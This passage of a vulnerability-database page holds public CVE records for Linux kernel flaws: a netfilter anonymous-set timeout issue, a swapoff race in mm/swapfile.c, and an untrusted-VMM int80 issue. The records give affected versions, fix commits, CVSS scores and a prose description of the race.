            ],
            "url": "https://git.kernel.org/stable/c/72c1efe3f247a581667b7d368fff3bd9a03cd57a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c0c2176d1814b92ea4c8e7eb7c9cd94cd99c1b12"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8e07c16695583a66e81f67ce4c46e94dece47ba7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/16603605b667b70da974bea8216c93e7db043bf1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "e4988d8415bd0294d6f9f4a1e7095f8b50a97ca9",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            },
            {
              "lessThan": "e9a0d3f376eb356d54ffce36e7cc37514cbfbd6f",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            },
            {
              "lessThan": "fe40ffbca19dc70d7c6b1e3c77b9ccb404c57351",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            },
            {
              "lessThan": "7cdc1be24cc1bcd56a3e89ac4aef20e31ad09199",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            },
            {
              "lessThan": "72c1efe3f247a581667b7d368fff3bd9a03cd57a",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            },
            {
              "lessThan": "c0c2176d1814b92ea4c8e7eb7c9cd94cd99c1b12",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            },
            {
              "lessThan": "8e07c16695583a66e81f67ce4c46e94dece47ba7",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            },
            {
              "lessThan": "16603605b667b70da974bea8216c93e7db043bf1",
              "status": "affected",
              "version": "761da2935d6e18d178582dbdf315a3a458555505",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/netfilter/nf_tables_api.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.1"
            },
            {
              "lessThan": "4.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: disallow anonymous set with timeout flag\n\nAnonymous sets are never used with timeout from userspace, reject this.\nException to this rule is NFT_SET_EVAL to ensure legacy meters still work."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:52:55.435Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e4988d8415bd0294d6f9f4a1e7095f8b50a97ca9"
        },
        {
          "url": "https://git.kernel.org/stable/c/e9a0d3f376eb356d54ffce36e7cc37514cbfbd6f"
        },
        {
          "url": "https://git.kernel.org/stable/c/fe40ffbca19dc70d7c6b1e3c77b9ccb404c57351"
        },
        {
          "url": "https://git.kernel.org/stable/c/7cdc1be24cc1bcd56a3e89ac4aef20e31ad09199"
        },
        {
          "url": "https://git.kernel.org/stable/c/72c1efe3f247a581667b7d368fff3bd9a03cd57a"
        },
        {
          "url": "https://git.kernel.org/stable/c/c0c2176d1814b92ea4c8e7eb7c9cd94cd99c1b12"
        },
        {
          "url": "https://git.kernel.org/stable/c/8e07c16695583a66e81f67ce4c46e94dece47ba7"
        },
        {
          "url": "https://git.kernel.org/stable/c/16603605b667b70da974bea8216c93e7db043bf1"
        }
      ],
      "title": "netfilter: nf_tables: disallow anonymous set with timeout flag",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26642",
    "datePublished": "2024-03-21T10:43:43.495Z",
    "dateReserved": "2024-02-19T14:20:24.137Z",
    "dateUpdated": "2025-05-04T08:52:55.435Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26960 (GCVE-0-2024-26960)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:19 – Updated: 2025-05-04 09:00

Title

mm: swap: fix race between free_swap_and_cache() and swapoff()

Summary

In the Linux kernel, the following vulnerability has been resolved: mm: swap: fix race between free_swap_and_cache() and swapoff() There was previously a theoretical window where swapoff() could run and teardown a swap_info_struct while a call to free_swap_and_cache() was running in another thread. This could cause, amongst other bad possibilities, swap_page_trans_huge_swapped() (called by free_swap_and_cache()) to access the freed memory for swap_map. This is a theoretical problem and I haven't been able to provoke it from a test case. But there has been agreement based on code review that this is possible (see link below). Fix it by using get_swap_device()/put_swap_device(), which will stall swapoff(). There was an extra check in _swap_info_get() to confirm that the swap entry was not free. This isn't present in get_swap_device() because it doesn't make sense in general due to the race between getting the reference and swapoff. So I've added an equivalent check directly in free_swap_and_cache(). Details of how to provoke one possible issue (thanks to David Hildenbrand for deriving this): --8<----- __swap_entry_free() might be the last user and result in "count == SWAP_HAS_CACHE". swapoff->try_to_unuse() will stop as soon as soon as si->inuse_pages==0. So the question is: could someone reclaim the folio and turn si->inuse_pages==0, before we completed swap_page_trans_huge_swapped(). Imagine the following: 2 MiB folio in the swapcache. Only 2 subpages are still references by swap entries. Process 1 still references subpage 0 via swap entry. Process 2 still references subpage 1 via swap entry. Process 1 quits. Calls free_swap_and_cache(). -> count == SWAP_HAS_CACHE [then, preempted in the hypervisor etc.] Process 2 quits. Calls free_swap_and_cache(). -> count == SWAP_HAS_CACHE Process 2 goes ahead, passes swap_page_trans_huge_swapped(), and calls __try_to_reclaim_swap(). __try_to_reclaim_swap()->folio_free_swap()->delete_from_swap_cache()-> put_swap_folio()->free_swap_slot()->swapcache_free_entries()-> swap_entry_free()->swap_range_free()-> ... WRITE_ONCE(si->inuse_pages, si->inuse_pages - nr_entries); What stops swapoff to succeed after process 2 reclaimed the swap cache but before process1 finished its call to swap_page_trans_huge_swapped()? --8<-----

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d85c11c97ecf92d47…
	https://git.kernel.org/stable/c/2da5568ee222ce054…
	https://git.kernel.org/stable/c/1ede7f1d7eed1738d…
	https://git.kernel.org/stable/c/0f98f6d2fb5fad00f…
	https://git.kernel.org/stable/c/3ce4c4c653e4e478e…
	https://git.kernel.org/stable/c/363d17e7f7907c8e2…
	https://git.kernel.org/stable/c/82b1c07a0af603e3c…

Impacted products

Vendor

Product

Version

Linux

Affected: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e , < d85c11c97ecf92d47a4b29e3faca714dc1f18d0d (git)
Affected: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e , < 2da5568ee222ce0541bfe446a07998f92ed1643e (git)
Affected: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e , < 1ede7f1d7eed1738d1b9333fd1e152ccb450b86a (git)
Affected: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e , < 0f98f6d2fb5fad00f8299b84b85b6bc1b6d7d19a (git)
Affected: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e , < 3ce4c4c653e4e478ecb15d3c88e690f12cbf6b39 (git)
Affected: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e , < 363d17e7f7907c8e27a9e86968af0eaa2301787b (git)
Affected: 7c00bafee87c7bac7ed9eced7c161f8e5332cb4e , < 82b1c07a0af603e3c47b906c8e991dc96f01688e (git)

Linux

Affected: 4.11
Unaffected: 0 , < 4.11 (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "d85c11c97ecf",
                "status": "affected",
                "version": "7c00bafee87c",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "2da5568ee222",
                "status": "affected",
                "version": "7c00bafee87c",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "1ede7f1d7eed",
                "status": "affected",
                "version": "7c00bafee87c",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "0f98f6d2fb5f",
                "status": "affected",
                "version": "7c00bafee87c",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "3ce4c4c653e4",
                "status": "affected",
                "version": "7c00bafee87c",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "363d17e7f790",
                "status": "affected",
                "version": "7c00bafee87c",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "82b1c07a0af6",
                "status": "affected",
                "version": "7c00bafee87c",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5.11",
                "status": "unaffected",
                "version": "5.10.215",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.2",
                "status": "unaffected",
                "version": "6.1.84",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.7",
                "status": "unaffected",
                "version": "6.6.24",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.9",
                "status": "unaffected",
                "version": "6.8.3",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "unaffected",
                "version": "6.9"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "4.11",
                "status": "unaffected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:4.11:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "4.11"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5.16",
                "status": "unaffected",
                "version": "5.15.154",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.8",
                "status": "unaffected",
                "version": "6.7.12",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26960",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-05T21:09:23.358079Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-362",
                "description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-02-05T21:09:44.704Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:06.048Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d85c11c97ecf92d47a4b29e3faca714dc1f18d0d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2da5568ee222ce0541bfe446a07998f92ed1643e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1ede7f1d7eed1738d1b9333fd1e152ccb450b86a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0f98f6d2fb5fad00f8299b84b85b6bc1b6d7d19a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3ce4c4c653e4e478ecb15d3c88e690f12cbf6b39"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/363d17e7f7907c8e27a9e86968af0eaa2301787b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/82b1c07a0af603e3c47b906c8e991dc96f01688e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "mm/swapfile.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d85c11c97ecf92d47a4b29e3faca714dc1f18d0d",
              "status": "affected",
              "version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
              "versionType": "git"
            },
            {
              "lessThan": "2da5568ee222ce0541bfe446a07998f92ed1643e",
              "status": "affected",
              "version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
              "versionType": "git"
            },
            {
              "lessThan": "1ede7f1d7eed1738d1b9333fd1e152ccb450b86a",
              "status": "affected",
              "version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
              "versionType": "git"
            },
            {
              "lessThan": "0f98f6d2fb5fad00f8299b84b85b6bc1b6d7d19a",
              "status": "affected",
              "version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
              "versionType": "git"
            },
            {
              "lessThan": "3ce4c4c653e4e478ecb15d3c88e690f12cbf6b39",
              "status": "affected",
              "version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
              "versionType": "git"
            },
            {
              "lessThan": "363d17e7f7907c8e27a9e86968af0eaa2301787b",
              "status": "affected",
              "version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
              "versionType": "git"
            },
            {
              "lessThan": "82b1c07a0af603e3c47b906c8e991dc96f01688e",
              "status": "affected",
              "version": "7c00bafee87c7bac7ed9eced7c161f8e5332cb4e",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "mm/swapfile.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.11"
            },
            {
              "lessThan": "4.11",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.11",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: swap: fix race between free_swap_and_cache() and swapoff()\n\nThere was previously a theoretical window where swapoff() could run and\nteardown a swap_info_struct while a call to free_swap_and_cache() was\nrunning in another thread.  This could cause, amongst other bad\npossibilities, swap_page_trans_huge_swapped() (called by\nfree_swap_and_cache()) to access the freed memory for swap_map.\n\nThis is a theoretical problem and I haven\u0027t been able to provoke it from a\ntest case.  But there has been agreement based on code review that this is\npossible (see link below).\n\nFix it by using get_swap_device()/put_swap_device(), which will stall\nswapoff().  There was an extra check in _swap_info_get() to confirm that\nthe swap entry was not free.  This isn\u0027t present in get_swap_device()\nbecause it doesn\u0027t make sense in general due to the race between getting\nthe reference and swapoff.  So I\u0027ve added an equivalent check directly in\nfree_swap_and_cache().\n\nDetails of how to provoke one possible issue (thanks to David Hildenbrand\nfor deriving this):\n\n--8\u003c-----\n\n__swap_entry_free() might be the last user and result in\n\"count == SWAP_HAS_CACHE\".\n\nswapoff-\u003etry_to_unuse() will stop as soon as soon as si-\u003einuse_pages==0.\n\nSo the question is: could someone reclaim the folio and turn\nsi-\u003einuse_pages==0, before we completed swap_page_trans_huge_swapped().\n\nImagine the following: 2 MiB folio in the swapcache. Only 2 subpages are\nstill references by swap entries.\n\nProcess 1 still references subpage 0 via swap entry.\nProcess 2 still references subpage 1 via swap entry.\n\nProcess 1 quits. Calls free_swap_and_cache().\n-\u003e count == SWAP_HAS_CACHE\n[then, preempted in the hypervisor etc.]\n\nProcess 2 quits. Calls free_swap_and_cache().\n-\u003e count == SWAP_HAS_CACHE\n\nProcess 2 goes ahead, passes swap_page_trans_huge_swapped(), and calls\n__try_to_reclaim_swap().\n\n__try_to_reclaim_swap()-\u003efolio_free_swap()-\u003edelete_from_swap_cache()-\u003e\nput_swap_folio()-\u003efree_swap_slot()-\u003eswapcache_free_entries()-\u003e\nswap_entry_free()-\u003eswap_range_free()-\u003e\n...\nWRITE_ONCE(si-\u003einuse_pages, si-\u003einuse_pages - nr_entries);\n\nWhat stops swapoff to succeed after process 2 reclaimed the swap cache\nbut before process1 finished its call to swap_page_trans_huge_swapped()?\n\n--8\u003c-----"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:00:51.074Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d85c11c97ecf92d47a4b29e3faca714dc1f18d0d"
        },
        {
          "url": "https://git.kernel.org/stable/c/2da5568ee222ce0541bfe446a07998f92ed1643e"
        },
        {
          "url": "https://git.kernel.org/stable/c/1ede7f1d7eed1738d1b9333fd1e152ccb450b86a"
        },
        {
          "url": "https://git.kernel.org/stable/c/0f98f6d2fb5fad00f8299b84b85b6bc1b6d7d19a"
        },
        {
          "url": "https://git.kernel.org/stable/c/3ce4c4c653e4e478ecb15d3c88e690f12cbf6b39"
        },
        {
          "url": "https://git.kernel.org/stable/c/363d17e7f7907c8e27a9e86968af0eaa2301787b"
        },
        {
          "url": "https://git.kernel.org/stable/c/82b1c07a0af603e3c47b906c8e991dc96f01688e"
        }
      ],
      "title": "mm: swap: fix race between free_swap_and_cache() and swapoff()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26960",
    "datePublished": "2024-05-01T05:19:12.112Z",
    "dateReserved": "2024-02-19T14:20:24.201Z",
    "dateUpdated": "2025-05-04T09:00:51.074Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-25744 (GCVE-0-2024-25744)

Vulnerability from cvelistv5 – Published: 2024-02-12 00:00 – Updated: 2025-05-07 21:07

Summary

In the Linux kernel before 6.6.7, an untrusted VMM can trigger int80 syscall handling at any given point. This is related to arch/x86/coco/tdx/tdx.c and arch/x86/mm/mem_encrypt_amd.c.

Severity ?

8.8 (High)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

n/a

Assigner

mitre

References

URL

Tags

	https://git.kernel.org/pub/scm/linux/kernel/git/t…
	https://cdn.kernel.org/pub/linux/kernel/v6.x/Chan…

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-11-15T13:08:14.245Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b82a8dbd3d2f4563156f7150c6f2ecab6e960b30"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.6.7"
          },
          {
            "url": "https://security.netapp.com/advisory/ntap-20241115-0006/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 8.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "CHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-25744",
                "options": [
                  {
                    "Exploitation": "none"
